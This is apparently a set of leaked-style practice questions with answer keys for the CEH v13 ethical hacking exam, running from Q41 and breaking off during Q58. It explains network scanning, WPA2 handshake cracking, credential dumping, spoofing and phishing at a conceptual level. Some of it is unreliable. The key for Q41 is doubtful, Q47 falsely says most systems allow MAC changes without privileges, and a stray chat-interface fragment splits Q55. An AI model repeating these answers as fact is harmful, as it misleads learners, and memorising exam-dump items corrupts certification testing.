ECCouncil 312-50v13 Certified Ethical Hacker v13 Exam Dumps and Practice Test Questions Set 3 Q 41-60 

Visit here for our full ECCouncil 312-50v13 exam dumps and practice test questions.

Question 41

An ethical hacker is conducting a penetration test and needs to identify live hosts on a network without triggering IDS/IPS systems. Which Nmap scan technique is most suitable for stealthy host discovery?

A) TCP SYN scan (-sS)

B) TCP Connect scan (-sT)

C) ICMP Echo scan (-PE)

D) TCP ACK scan (-sA)

Answer: D

Explanation:

When conducting stealthy reconnaissance during a penetration test, selecting the appropriate scanning technique is crucial to avoid detection by intrusion detection and prevention systems. The TCP ACK scan is particularly effective for stealthy host discovery and firewall rule mapping.

TCP ACK scan (-sA) sends TCP packets with only the ACK flag set. This technique is highly stealthy because ACK packets are typically part of established connections, making them less suspicious to security devices. Stateless firewalls and some IDS/IPS systems may not flag these packets as scanning attempts since they appear to be part of legitimate traffic. The scan helps determine firewall rules by analyzing responses: if a RST packet is received, the port is classified as “unfiltered,” while no response indicates the port is “filtered.” This information is valuable for understanding network security posture without raising alarms.

The scan operates by exploiting how firewalls handle different packet types. Since ACK packets are associated with established connections, many firewalls allow them through, providing insights into the network topology and filtering rules. This makes TCP ACK scanning particularly useful in the reconnaissance phase when stealth is paramount.

Why other options are incorrect:

A) TCP SYN scan is efficient and commonly called a “half-open” scan, but it’s more detectable than ACK scans. Most modern IDS/IPS systems are configured to detect SYN scanning patterns, as incomplete three-way handshakes are clear indicators of scanning activity.

B) TCP Connect scan completes the full three-way handshake, making it the loudest and most detectable scan type. It generates complete connection logs on target systems and is easily detected by security monitoring tools.

C) ICMP Echo scan sends ping requests, which are frequently blocked by firewalls and easily detected. Many networks disable ICMP responses, making this technique both noisy and often ineffective.

Question 42

A company’s web application is vulnerable to SQL injection attacks. Which of the following is the MOST effective defense mechanism to prevent SQL injection vulnerabilities?

A) Input validation using blacklisting

B) Parameterized queries with prepared statements

C) Web Application Firewall (WAF)

D) Encoding special characters in user input

Answer: B

Explanation:

SQL injection remains one of the most critical web application vulnerabilities, and implementing effective countermeasures is essential for application security. Parameterized queries with prepared statements represent the most robust and effective defense against SQL injection attacks.

Parameterized queries work by separating SQL code from user-supplied data. When using prepared statements, the SQL query structure is defined first with placeholders for user input, and then user data is bound to these placeholders separately. The database engine treats the bound parameters as pure data, never as executable SQL code, regardless of what characters or commands the data contains. This fundamental separation makes SQL injection technically impossible because malicious SQL syntax in user input cannot alter the query structure.

The database driver automatically handles proper escaping and type checking for parameters, eliminating human error in sanitization. This approach works consistently across different database systems and provides strong security guarantees. Modern programming frameworks and ORMs (Object-Relational Mapping tools) support parameterized queries natively, making implementation straightforward.

For example, instead of concatenating user input directly into SQL: SELECT * FROM users WHERE username = ‘” + userInput + “‘”, a parameterized query uses: SELECT * FROM users WHERE username = ? with the user input bound separately as a parameter.

Why other options are incorrect:

A) Blacklisting is inherently weak because attackers can bypass filters using encoding, obfuscation, or alternative syntax. It’s impossible to anticipate all possible malicious inputs, and blacklists require constant updates.

C) WAF provides an additional security layer but shouldn’t be the primary defense. WAFs can be bypassed, may have false positives/negatives, and should complement secure coding practices rather than replace them.

D) Encoding special characters helps but doesn’t address the root cause. Sophisticated attacks can still bypass encoding, and this approach requires perfect implementation across all input points.

Question 43

During a wireless network assessment, an ethical hacker discovers a network using WPA2-PSK. Which attack method is most effective for compromising the pre-shared key?

A) Evil twin attack

B) Deauthentication attack followed by capturing the 4-way handshake

C) Jamming attack

D) Rogue access point attack

Answer: B

Explanation:

Compromising WPA2-PSK (Wi-Fi Protected Access 2 with Pre-Shared Key) networks requires capturing authentication credentials and performing offline cracking. The deauthentication attack followed by capturing the 4-way handshake is the most effective method for obtaining the necessary data to crack the pre-shared key.

The 4-way handshake is a critical authentication process that occurs when a client connects to a WPA2-PSK access point. During this handshake, the access point and client exchange four EAPOL (Extensible Authentication Protocol over LAN) frames that contain encrypted data derived from the PSK. Once captured, this handshake can be subjected to offline dictionary or brute-force attacks to recover the original password.

The deauthentication attack forcibly disconnects legitimate clients from the access point by sending spoofed deauthentication frames. This causes clients to automatically attempt reconnection, generating fresh 4-way handshakes that the attacker can capture using tools like Wireshark or airodump-ng. The captured handshake is then processed with tools like aircrack-ng, Hashcat, or John the Ripper, using wordlists or brute-force techniques to find the matching PSK.

This attack is effective because it exploits the authentication mechanism itself rather than attempting to break the encryption in real-time. The offline nature means the attacker can use unlimited computational resources without detection.

Why other options are incorrect:

A) Evil twin attacks create fake access points to trick users into connecting, but don’t directly crack the legitimate network’s PSK. They rely on social engineering rather than cryptographic attacks.

C) Jamming attacks cause denial of service by flooding frequencies with noise, but don’t provide any credentials or authentication data needed to access the network.

D) Rogue access points can intercept traffic from users who mistakenly connect, but don’t compromise the legitimate network’s PSK or provide access to the actual target network.

Question 44

An organization wants to implement a security control that monitors network traffic for malicious activity and can automatically block threats. Which solution should be deployed?

A) Intrusion Detection System (IDS)

B) Intrusion Prevention System (IPS)

C) Security Information and Event Management (SIEM)

D) Network Access Control (NAC)

Answer: B

Explanation:

Organizations need proactive security solutions that not only detect threats but can also automatically respond to prevent damage. An Intrusion Prevention System (IPS) is specifically designed to monitor network traffic for malicious activity and automatically block threats in real-time, making it the ideal solution for this requirement.

IPS devices are deployed inline with network traffic, meaning all packets must pass through the IPS before reaching their destination. This positioning allows the IPS to actively inspect traffic, identify malicious patterns or signatures, and immediately drop or block suspicious packets before they reach target systems. IPS combines detection capabilities with automated prevention actions, providing real-time protection against various threats including exploits, malware, DDoS attacks, and policy violations.

Modern IPS solutions use multiple detection methods: signature-based detection (matching known attack patterns), anomaly-based detection (identifying deviations from baseline behavior), and protocol analysis (detecting protocol violations). When threats are identified, the IPS can take various actions: dropping malicious packets, blocking the source IP address, resetting connections, or generating alerts for security teams.

The automated blocking capability is crucial—it eliminates the delay between threat detection and response, stopping attacks before damage occurs. This is particularly important for zero-day exploits and rapidly spreading threats where manual intervention would be too slow.

Why other options are incorrect:

A) IDS only monitors and alerts on suspicious activity but cannot automatically block threats. It operates in passive mode, analyzing traffic copies, requiring manual intervention to stop attacks. This detection-only approach leaves a window of vulnerability.

C) SIEM systems collect, correlate, and analyze security logs from multiple sources for comprehensive visibility and compliance reporting. However, SIEM doesn’t directly monitor network packets or automatically block traffic—it’s primarily for analysis and investigation.

D) NAC controls which devices can access the network based on compliance and authentication policies, but doesn’t inspect traffic content for malicious activity or provide real-time threat blocking capabilities.

Question 45

A penetration tester needs to extract password hashes from a Windows system. Which tool is specifically designed for dumping credentials from Windows memory?

A) John the Ripper

B) Mimikatz

C) Hashcat

D) Hydra

Answer: B

Explanation:

Extracting credentials from compromised Windows systems is a critical post-exploitation technique used by penetration testers and ethical hackers to assess the extent of potential damage from a security breach. Mimikatz is the specialized tool designed specifically for dumping credentials, including password hashes, plaintext passwords, and Kerberos tickets from Windows memory.

Mimikatz was developed by Benjamin Delpy and has become the industry-standard tool for Windows credential extraction. It exploits the way Windows stores authentication credentials in the Local Security Authority Subsystem Service (LSASS) process memory. The tool can extract various types of credentials including NTLM hashes, Kerberos tickets (Golden Ticket and Silver Ticket attacks), plaintext passwords (when WDigest is enabled), and domain cached credentials.

The tool operates by reading memory from the LSASS process, which handles authentication on Windows systems. Mimikatz requires administrative or SYSTEM-level privileges to access this protected memory space. Once executed, it can dump credentials of all users who have logged into the system, including privileged accounts. This makes it invaluable for demonstrating lateral movement risks during penetration tests.

Mimikatz also includes functionality for pass-the-hash attacks, pass-the-ticket attacks, and privilege escalation. Security professionals use it to demonstrate the importance of proper credential management, privileged access management solutions, and endpoint protection.

Why other options are incorrect:

A) John the Ripper is a password cracking tool that works with already-extracted hashes. It doesn’t extract credentials from memory but rather attempts to crack hashes through dictionary attacks, brute-force, or rainbow tables.

C) Hashcat is another password cracking tool optimized for GPU acceleration. Like John the Ripper, it requires pre-extracted hashes and focuses on cracking rather than credential extraction from live systems.

D) Hydra is a network login cracker that performs brute-force attacks against network services like SSH, FTP, HTTP, and SMB. It doesn’t extract credentials from memory but attempts to guess passwords through network protocols.

Question 46

An ethical hacker discovers that a web application is vulnerable to Cross-Site Scripting (XSS). Which type of XSS occurs when malicious scripts are permanently stored on the target server?

A) Reflected XSS

B) Stored XSS

C) DOM-based XSS

D) Blind XSS

Answer: B

Explanation:

Cross-Site Scripting (XSS) vulnerabilities allow attackers to inject malicious scripts into web applications, potentially compromising user data and sessions. Understanding the different types of XSS is crucial for effective security assessment and remediation. Stored XSS occurs when malicious scripts are permanently stored on the target server in databases, message forums, comment fields, or other persistent storage.

Stored XSS (also called Persistent XSS) is considered the most dangerous type of XSS because the malicious payload is saved on the server and automatically executed whenever users access the affected page. The attack doesn’t require victim interaction beyond visiting the compromised page, making it highly effective and potentially affecting many users.

Common scenarios include: comment sections where attackers post malicious scripts, user profile fields that display unsanitized input, forum posts, blog comments, or any feature where user input is stored and later displayed to other users. When a victim views the infected content, the browser executes the malicious script, believing it’s legitimate code from the trusted website.

The impact can be severe: session hijacking (stealing authentication cookies), credential theft through fake login forms, website defacement, redirecting users to malicious sites, installing malware, or performing actions on behalf of victims. The persistent nature means a single injection can compromise multiple users over extended periods.

Why other options are incorrect:

A) Reflected XSS (Non-Persistent XSS) doesn’t store malicious code on the server. Instead, the payload is embedded in URLs or form submissions and immediately reflected back to users. It requires tricking victims into clicking malicious links.

C) DOM-based XSS occurs entirely client-side when JavaScript code processes user input unsafely without sending it to the server. The vulnerability exists in client-side code that dynamically modifies the DOM based on user input.

D) Blind XSS is a variant of Stored XSS where the attacker cannot see the results immediately. The payload is stored but executes in a different context (like admin panels), making detection challenging.

Question 47

During a security assessment, an ethical hacker needs to bypass Network Access Control (NAC) that uses MAC address filtering. Which technique would be most effective?

A) ARP poisoning

B) MAC address spoofing

C) DNS spoofing

D) IP address spoofing

Answer: B

Explanation:

Network Access Control (NAC) systems often implement MAC address filtering as a security measure to restrict network access to authorized devices. However, this security control can be bypassed through various techniques, with MAC address spoofing being the most direct and effective method.

MAC address spoofing involves changing the Media Access Control address of a network interface to impersonate an authorized device. Since MAC addresses operate at Layer 2 of the OSI model and are typically easy to modify through software, attackers can observe legitimate MAC addresses on the network and clone them to gain unauthorized access.

The attack process typically involves: first, using tools like Wireshark, airodump-ng, or netdiscover to capture and identify authorized MAC addresses on the network; second, disconnecting or waiting for an authorized device to disconnect; third, changing the attacker’s MAC address to match the authorized device using commands like ifconfig (Linux/Mac) or macchanger, or modifying registry settings (Windows); and finally, connecting to the network while presenting the spoofed MAC address.

This technique is particularly effective because MAC filtering provides only basic access control without strong authentication. Most operating systems allow MAC address modification without requiring special privileges, and NAC systems relying solely on MAC filtering have no mechanism to verify whether the device claiming an MAC address is the legitimate owner.

Why other options are incorrect:

A) ARP poisoning is used for man-in-the-middle attacks by associating the attacker’s MAC address with another device’s IP address, redirecting traffic. While useful for interception, it doesn’t bypass MAC filtering since the attacker still needs network access first.

C) DNS spoofing manipulates DNS responses to redirect traffic to malicious servers. This attack occurs after gaining network access and doesn’t address MAC-based access control restrictions at the network layer.

D) IP address spoofing involves falsifying the source IP address in packets. However, this doesn’t bypass MAC filtering since network switches and access points operate at Layer 2, making decisions based on MAC addresses before examining IP addresses.

Question 48

An organization implements a security measure where employees must provide two different authentication factors to access systems. Which authentication combination represents two-factor authentication?

A) Password and PIN

B) Password and security question

C) Password and fingerprint scan

D) Password and username

Answer: C

Explanation:

Multi-factor authentication (MFA) significantly enhances security by requiring users to provide multiple forms of verification. True two-factor authentication requires combining two different types of authentication factors from separate categories, making password and fingerprint scan the correct implementation.

Authentication factors are categorized into three main types: something you know (knowledge factors like passwords, PINs, security questions), something you have (possession factors like smart cards, tokens, mobile devices), and something you are (inherence factors like biometrics including fingerprints, facial recognition, iris scans, voice patterns).

The password and fingerprint combination provides strong security because it combines two different factor types: a knowledge factor (password – something you know) and a biometric factor (fingerprint – something you are). This means an attacker would need to both know the password and have access to the user’s physical biometric characteristics, significantly increasing security beyond single-factor authentication.

Biometric authentication offers unique advantages: it’s difficult to steal, forget, or transfer; provides non-repudiation since biometrics are inherently tied to individuals; and cannot be easily guessed like passwords. When combined with passwords, this creates a robust security posture where compromising one factor alone is insufficient for unauthorized access.

The implementation typically requires users to enter their password first, then verify their identity through fingerprint scanning using specialized readers or mobile device sensors.

Why other options are incorrect:

A) Password and PIN are both knowledge factors (something you know). Using two factors from the same category doesn’t constitute true two-factor authentication—it’s merely two-step verification using a single factor type, providing minimal additional security.

B) Password and security questions are also both knowledge factors. Security questions are often weaker than passwords since answers may be discoverable through social engineering or public information on social media.

D) Username is not an authentication factor—it’s an identifier that specifies which account is being accessed. Usernames are typically public or semi-public information and provide no security value in authentication.

Question 49

A penetration tester wants to perform a man-in-the-middle attack on a local network to intercept traffic between two hosts. Which technique involves poisoning the ARP cache of target systems?

A) DNS cache poisoning

B) ARP spoofing

C) Session hijacking

D) IP spoofing

Answer: B

Explanation:

Man-in-the-middle (MITM) attacks on local networks exploit fundamental protocols to intercept communications between hosts. ARP spoofing (also called ARP poisoning or ARP cache poisoning) is the primary technique used to position an attacker between two communicating parties on a Local Area Network.

ARP (Address Resolution Protocol) is used to map IP addresses to MAC addresses on local networks. When a device needs to communicate with another device on the same network, it broadcasts an ARP request asking “Who has IP address X?” The device with that IP responds with its MAC address, and this mapping is cached in the ARP table for efficiency.

ARP spoofing exploits the stateless nature of ARP—devices accept ARP replies even without sending requests, and there’s no authentication mechanism. The attacker sends forged ARP replies to target hosts, associating the attacker’s MAC address with the IP address of another device (typically the gateway). This causes victims to send traffic intended for the legitimate destination to the attacker instead.

The attack typically involves sending crafted ARP replies to both the victim and the gateway, making each believe the attacker’s MAC address belongs to the other party. All traffic flows through the attacker, who can inspect, modify, or forward it to maintain the connection. Tools like Ettercap, arpspoof, and Bettercap automate this process.

Why other options are incorrect:

A) DNS cache poisoning corrupts DNS resolver caches to redirect domain name queries to malicious IP addresses. This operates at a higher layer and doesn’t involve ARP or direct Layer 2 interception on local networks.

C) Session hijacking involves taking over an established session between a user and server, typically by stealing session tokens or cookies. While it may follow MITM positioning, it’s not the technique for achieving MITM status.

D) IP spoofing falsifies source IP addresses in packets but doesn’t enable bidirectional MITM attacks on local networks. Responses would still go to the legitimate IP address unless combined with other techniques.

Question 50

An ethical hacker is conducting a social engineering assessment and sends emails that appear to come from a trusted source within the organization. What type of attack is being performed?

A) Phishing

B) Whaling

C) Spear phishing

D) Vishing

Answer: C

Explanation:

Social engineering attacks exploit human psychology rather than technical vulnerabilities. When an ethical hacker sends targeted emails appearing to come from trusted sources within an organization, this represents spear phishing, a sophisticated and highly effective attack method.

Spear phishing is a targeted form of phishing that focuses on specific individuals or organizations using personalized information to increase credibility and success rates. Unlike generic phishing campaigns sent to thousands of random recipients, spear phishing involves research and customization. Attackers gather information about targets through social media, company websites, public records, and other sources to craft convincing messages that reference specific projects, colleagues, organizational structure, or internal processes.

The emails in spear phishing attacks typically impersonate trusted entities—executives, IT departments, HR personnel, or business partners. They may use domain spoofing, compromised accounts, or look-alike domains to appear legitimate. The content often creates urgency (“Your account will be locked unless you verify credentials”) or appeals to authority (“The CEO needs this information immediately”) to bypass rational decision-making.

The goal varies: stealing credentials through fake login pages, installing malware via malicious attachments, initiating fraudulent wire transfers, or extracting sensitive information. Spear phishing is particularly dangerous because personalization makes detection difficult—emails appear contextually appropriate, making recipients less suspicious.

Organizations are vulnerable because security awareness training often focuses on generic phishing indicators, while spear phishing emails may lack obvious red flags like grammatical errors or suspicious sender addresses when properly crafted.

Why other options are incorrect:

A) Phishing is a broad term for fraudulent communications (usually emails) attempting to steal sensitive information or install malware. Generic phishing campaigns are untargeted, sent to large numbers of recipients with the same message, lacking personalization.

B) Whaling is a specific subset of spear phishing that targets high-profile individuals like executives, board members, or celebrities. While it uses similar techniques, whaling specifically focuses on “big fish” rather than general employees.

D) Vishing (voice phishing) uses telephone calls rather than emails to manipulate victims into revealing information or performing actions. It’s a different attack vector entirely, though it may be combined with email-based attacks.

Question 51

A security analyst discovers that an attacker has gained unauthorized access to a system and created a backdoor for persistent access. Which phase of the Cyber Kill Chain does this activity represent?

A) Reconnaissance

B) Weaponization

C) Installation

D) Command and Control

Answer: C

Explanation:

The Cyber Kill Chain, developed by Lockheed Martin, is a framework that describes the stages of a cyber attack from reconnaissance to data exfiltration. Understanding each phase helps security professionals identify and disrupt attacks at various stages. The Installation phase occurs when attackers establish persistent access to compromised systems by installing backdoors, rootkits, or other malware.

Installation represents a critical turning point in an attack where temporary access becomes permanent. After successfully exploiting vulnerabilities and gaining initial access (Exploitation phase), attackers need mechanisms to maintain their foothold even after system reboots, credential changes, or detection of the initial exploit. Backdoors serve this purpose by creating alternative entry points that bypass normal authentication mechanisms.

Common installation techniques include: creating hidden user accounts with administrative privileges, modifying system startup scripts to launch malicious code automatically, installing remote access trojans (RATs) that connect back to attacker-controlled servers, placing webshells on compromised web servers, modifying system binaries or libraries, or exploiting scheduled tasks and services for persistence.

The backdoor may use various persistence mechanisms: Windows Registry modifications, scheduled tasks, service creation, DLL hijacking, or startup folder placement. Sophisticated attackers employ rootkit techniques to hide their presence from security tools and system administrators, making detection challenging.

This phase is crucial for defenders to understand because successful installation significantly increases the cost and difficulty of remediation—simply patching the initial vulnerability becomes insufficient once persistent backdoors exist.

Why other options are incorrect:

A) Reconnaissance is the initial phase where attackers gather information about targets through passive and active techniques. No system access or compromise occurs during reconnaissance—it’s purely information gathering.

B) Weaponization involves preparing attack tools by coupling exploits with payloads (like malware) to create deliverable packages. This occurs before attempting compromise and doesn’t involve access to target systems.

D) Command and Control (C2) is the phase after installation where attackers establish communication channels to remotely control compromised systems. While backdoors facilitate C2, the act of creating and installing the backdoor itself belongs to the Installation phase.

Question 52

An organization wants to test its incident response procedures and employee awareness without causing actual damage or disruption. Which type of security assessment should be conducted?

A) Vulnerability assessment

B) Penetration test

C) Red team exercise

D) Tabletop exercise

Answer: D

Explanation:

Organizations need to regularly test their security preparedness, but not all testing methods involve technical attacks or system disruption. A tabletop exercise provides a discussion-based approach to evaluate incident response procedures and employee awareness without causing actual damage or operational disruption.

Tabletop exercises are structured discussion sessions where key personnel walk through simulated security incident scenarios in a controlled, low-pressure environment. Participants include incident response team members, management, IT staff, legal counsel, public relations, and other relevant stakeholders who would be involved in actual incident response.

During the exercise, a facilitator presents a realistic scenario—such as ransomware infection, data breach, DDoS attack, or insider threat—and asks participants to describe how they would respond. The discussion covers: initial detection and assessment, escalation procedures, communication protocols (internal and external), containment strategies, evidence preservation, recovery processes, legal obligations, and public disclosure requirements.

The primary benefits include: identifying gaps in incident response plans, clarifying roles and responsibilities, improving coordination between departments, testing communication channels, validating decision-making processes, ensuring documentation completeness, and building team familiarity with procedures—all without any risk to production systems or data.

Tabletop exercises are cost-effective, can be conducted regularly (quarterly or semi-annually), and provide valuable learning opportunities. They complement technical security assessments by focusing on human and procedural elements that technical tests don’t address.

Why other options are incorrect:

A) Vulnerability assessments use automated tools to scan systems for known vulnerabilities, misconfigurations, and security weaknesses. While non-disruptive, they don’t test incident response procedures or employee awareness—they focus on identifying technical flaws.

B) Penetration tests involve actively exploiting vulnerabilities to determine how far attackers could penetrate systems. These are technical assessments that may cause disruption and don’t primarily test incident response procedures or awareness.

C) Red team exercises simulate real-world attacks using adversarial tactics to test detection and response capabilities. While valuable, they involve actual attempts to compromise systems and may cause disruption, making them unsuitable for testing without potential impact.

Question 53

A web application stores session identifiers in URLs instead of secure cookies. Which vulnerability does this implementation create?

A) Cross-Site Request Forgery (CSRF)

B) Session fixation

C) Session hijacking through URL exposure

D) SQL injection

Answer: C

Explanation:

Proper session management is critical for web application security. When applications store session identifiers in URLs rather than secure cookies, they create significant vulnerability to session hijacking through URL exposure, compromising user authentication and confidentiality.

Session identifiers in URLs appear as parameters in the query string, for example: https://example.com/dashboard?sessionid=abc123xyz. This implementation method creates multiple attack vectors that expose session tokens to unauthorized parties.

The primary security issues include: URL sharing—users may inadvertently share links containing their session IDs via email, messaging, or social media, giving recipients full access to their authenticated session; browser history—session IDs stored in browser history remain accessible even after logout, allowing anyone with physical access to the computer to hijack sessions; referrer header leakage—when users click external links, the entire URL (including session ID) may be transmitted in the HTTP Referer header to third-party websites; server logs—web servers and proxy servers log complete URLs, exposing session IDs to anyone with log access; browser bookmarks—users may bookmark pages with session IDs, creating persistent authentication bypass opportunities.

Attackers gaining access to session IDs can impersonate legitimate users without knowing passwords, accessing sensitive data, performing unauthorized transactions, or modifying account information. The impact is severe because session hijacking bypasses authentication entirely.

Why other options are incorrect:

A) CSRF exploits authenticated sessions to perform unauthorized actions, but the vulnerability stems from lack of anti-CSRF tokens and validation, not from where session IDs are stored. URL-based sessions don’t inherently cause CSRF.

B) Session fixation involves forcing a known session ID onto victims before authentication. While URL-based sessions may facilitate this, the primary vulnerability described is exposure of existing valid session IDs rather than fixation attacks.

D) SQL injection involves injecting malicious SQL code through input fields to manipulate database queries. Session ID storage location doesn’t directly relate to SQL injection vulnerabilities, which stem from improper input validation and parameterization.

Question 54

An ethical hacker discovers that a network device has default credentials that were never changed. Which vulnerability category does this represent?

A) Zero-day vulnerability

B) Misconfiguration

C) Buffer overflow

D) Race condition

Answer: B

Explanation:

Security vulnerabilities arise from various sources, including software bugs, design flaws, and human errors. Default credentials that remain unchanged represent a misconfiguration vulnerability, one of the most common and easily exploitable security weaknesses in IT environments.

Misconfiguration vulnerabilities occur when security settings, configurations, or hardening procedures are inadequately implemented, leaving systems in insecure default states. Default credentials specifically refer to manufacturer-set usernames and passwords (like admin/admin, root/root, or admin/password) that are intended for initial setup but should be changed immediately upon deployment.

The security risk is severe because: default credentials are publicly documented in product manuals and online databases, making them easily accessible to attackers; automated scanning tools and botnets specifically target devices with default credentials; successful authentication provides immediate administrative access without requiring sophisticated exploitation techniques; and many IoT devices, routers, network appliances, and industrial control systems ship with default credentials that users frequently neglect to change.

Attackers exploit this misconfiguration through simple credential testing against internet-exposed devices. The Mirai botnet famously leveraged default credentials to compromise hundreds of thousands of IoT devices, creating massive DDoS capabilities. Similar attacks continue targeting security cameras, routers, NAS devices, and building management systems.

Prevention requires: mandatory password changes during initial setup, regular security audits scanning for default credentials, security baselines enforcing proper configuration, and security awareness training emphasizing hardening procedures.

Why other options are incorrect:

A) Zero-day vulnerabilities are previously unknown software flaws without available patches. Default credentials are neither unknown nor software bugs—they’re intentional design choices that users fail to change, representing configuration issues rather than undisclosed vulnerabilities.

C) Buffer overflow vulnerabilities occur when programs write data beyond allocated memory boundaries, potentially allowing arbitrary code execution. These are software coding errors unrelated to credential management or configuration practices.

D) Race conditions are timing-dependent software bugs where program behavior depends on the sequence or timing of uncontrollable events. They’re concurrency issues in code logic, completely different from configuration-related security weaknesses.

Question 55

During a penetration test, an ethical hacker successfully exploits a vulnerability and gains low-privileged access to a system. What is the next phase typically performed to gain higher-level access?

A) Lateral movement

B) Privilege escalation

C) Data exfiltration

D) Covering tracks

Answer: B

Explanation:

Penetration testing follows a methodology that mirrors real-world attack progression. After gaining initial access with limited privileges, the next critical step is privilege escalation, which involves elevating access rights from a low-privileged user to administrator or system-level privileges.

Privilege escalation is essential because initial compromise often provides only basic user access with significant restrictions: limited file system access, inability to install software, restrictions on viewing sensitive data, and inability to modify system configurations. Administrative privileges are required to fully assess potential damage, access critical assets, install persistent backdoors, and demonstrate the complete security impact.

Privilege escalation occurs through two main categories: vertical privilege escalation (gaining higher-level access on the same system, like standard user to administrator) and horizontal privilege escalation (accessing resources of another user at the same privilege level).

Common techniques include: exploiting unpatched kernel vulnerabilities, leveraging misconfigured services running with elevated privileges, exploiting weak file permissions on sensitive configuration files, abusing sudo misconfigurations on Linux systems, exploiting scheduled tasks running as SYSTEM on Windows, using stored credentials in files or memory, exploiting DLL hijacking or path interception vulnerabilities, and leveraging token manipulation or impersonation privileges.

Successful privilege escalation dramatically increases attack impact, allowing installation of persistent malware, creation of backdoor accounts, access to all data, system-wide configuration changes, and potential lateral movement to other networked systems.

Why other options are incorrect:

A) Lateral movement involves moving from one compromised system to other systems in the network. This typically occurs after privilege escalation,

Retry

R

Continue

once administrative access is established and credentials or techniques for accessing other systems are obtained.

C) Data exfiltration is the process of stealing and transmitting data outside the organization. This typically occurs later in the attack lifecycle, after gaining sufficient privileges to access valuable data and establishing methods to extract it without detection.

D) Covering tracks involves hiding evidence of compromise by deleting logs, removing artifacts, and eliminating traces of malicious activity. This is typically one of the final phases, performed after achieving objectives to avoid detection and maintain access.

Question 56

A security team wants to implement a solution that isolates untrusted code execution and prevents malware from accessing the underlying operating system. Which technology should be deployed?

A) Virtual Private Network (VPN)

B) Firewall

C) Sandboxing

D) Intrusion Detection System (IDS)

Answer: C

Explanation:

Protecting systems from malicious code requires isolation mechanisms that prevent untrusted software from damaging the host environment. Sandboxing is specifically designed to execute potentially malicious code in an isolated environment, preventing it from accessing or affecting the underlying operating system and other applications.

Sandboxing creates a controlled, restricted execution environment with limited access to system resources, file systems, network connections, and other processes. When suspicious files or applications run in a sandbox, any malicious actions are contained within that isolated space, protecting the host system from compromise.

Modern sandboxing implementations use various isolation techniques: virtualization-based sandboxes create lightweight virtual machines for each untrusted process; container-based sandboxes use operating system-level virtualization for isolation; application-level sandboxes restrict specific programs through security policies; and browser sandboxes isolate web content rendering from the operating system.

Security benefits include: malware analysis—security researchers can safely analyze malware behavior without risking infection; zero-day protection—sandboxing provides defense against unknown threats that signatures can’t detect; safe browsing—web browsers use sandboxes to isolate potentially malicious websites; email attachment protection—organizations sandbox email attachments before delivery; and application testing—developers test untrusted code safely before deployment.

Enterprise sandboxing solutions monitor sandboxed processes for suspicious behaviors like file encryption, registry modifications, network communications to command-and-control servers, or privilege escalation attempts. Based on observed behavior, systems can block or quarantine threats.

Why other options are incorrect:

A) VPN creates encrypted tunnels for secure remote network access, protecting data in transit from eavesdropping. VPNs don’t isolate code execution or prevent malware from accessing operating systems—they address network security rather than endpoint protection.

B) Firewalls filter network traffic based on rules, blocking unauthorized connections and controlling which services are accessible. While firewalls prevent network-based attacks, they don’t isolate code execution or stop malware already on the system from accessing local resources.

D) IDS monitors network traffic and system activity for suspicious patterns, generating alerts when potential attacks are detected. IDS is passive detection technology that doesn’t isolate code execution or prevent malware from running—it only identifies threats after they occur.

Question 57

An organization implements a policy where access rights are granted based on job responsibilities and the principle of least privilege. Which access control model is being used?

A) Mandatory Access Control (MAC)

B) Discretionary Access Control (DAC)

C) Role-Based Access Control (RBAC)

D) Attribute-Based Access Control (ABAC)

Answer: C

Explanation:

Access control models define how permissions are assigned and enforced within information systems. When access rights are granted based on job responsibilities and the principle of least privilege, the organization is implementing Role-Based Access Control (RBAC), one of the most widely adopted access control models in enterprise environments.

RBAC assigns permissions to roles rather than individual users, and users are then assigned to roles based on their job functions and responsibilities. This approach simplifies access management, improves security consistency, and ensures users have exactly the permissions needed to perform their duties without excessive privileges.

The RBAC model operates on key principles: roles represent job functions (like “Accountant,” “HR Manager,” “Database Administrator”), each role has specific permissions associated with business responsibilities; users are assigned to roles based on their organizational position; permissions are granted to roles rather than individuals; and principle of least privilege ensures roles contain only minimum necessary permissions.

Implementation benefits include: simplified administration—adding new employees means assigning appropriate roles rather than configuring individual permissions; improved security—consistent permission sets reduce errors and unauthorized access; easier auditing—reviewing role definitions is simpler than checking individual user permissions; separation of duties—conflicting responsibilities can be separated across different roles; and scalability—organizations can manage thousands of users efficiently through standardized roles.

For example, all accountants receive the same permissions by being assigned to the “Accountant” role, which includes access to financial systems, reporting tools, and relevant documents, but excludes HR data, development tools, or administrative functions outside their job scope.

Why other options are incorrect:

A) MAC uses security labels and clearance levels enforced by the system, typically in military and government environments. Access decisions are based on data classification (Top Secret, Secret, Confidential) and user clearance levels, not job responsibilities.

B) DAC allows data owners to control access to their resources at their discretion. Users can grant or revoke permissions to files they own, which doesn’t align with centralized, role-based administration or systematic least privilege enforcement.

D) ABAC makes access decisions based on multiple attributes (user attributes, resource attributes, environmental conditions) evaluated through policies. While flexible and granular, it’s more complex than role-based assignment and isn’t specifically tied to job responsibilities as the primary access determinant.

Question 58

A penetration tester wants to identify all subdomains of a target domain to discover potential attack surfaces. Which reconnaissance technique is most appropriate?

A) Port scanning

B) DNS enumeration

C) Vulnerability scanning

D) Network sniffing

Answer: B

Explanation:

Reconnaissance is the critical first phase of penetration testing where ethical hackers gather information about targets to identify potential attack vectors. For discovering subdomains and understanding the domain structure of an organization, DNS enumeration is the most appropriate and effective technique.

DNS enumeration involves querying Domain Name System records to discover information about a target’s infrastructure, including subdomains, mail servers, name servers, and IP addresses. Subdomains often represent different services, departments, or systems (like mail.example.com, dev.example.com, vpn.example.com, admin.example.com) that may have varying security postures.

Common DNS enumeration techniques include: DNS zone transfers (requesting complete zone files from misconfigured DNS servers), brute-force subdomain discovery (testing common subdomain names from wordlists), DNS record queries (querying A, AAAA, MX, TXT, NS, SOA records), reverse DNS lookups (finding domain names associated with IP addresses), and certificate transparency logs (examining SSL certificate records that list subdomains).

Popular tools for DNS enumeration include: dnsrecon, dnsenum, fierce, sublist3r, amass, and subfinder. These tools automate the discovery process, querying multiple sources including search engines, certificate databases, DNS servers, and threat intelligence platforms.

Discovering subdomains is valuable because: development and staging environments often have weaker security than production; forgotten or abandoned subdomains may contain vulnerabilities; administrative interfaces might be exposed on subdomains; different subdomains may run different software versions with varying vulnerability profiles; and comprehensive subdomain mapping reveals the attack surface extent.

Why other options are incorrect:

A) Port scanning identifies open ports and services on known IP addresses or hostnames. While valuable for reconnaissance, it doesn’t discover subdomains—you need to know target addresses first before scanning them. Port scanning occurs after subdomain discovery.

C) Vulnerability scanning uses automated tools to identify security weaknesses in known systems. Like port scanning, this requires knowing target systems first. Vulnerability scanning is an assessment technique that follows reconnaissance phases like subdomain discovery.

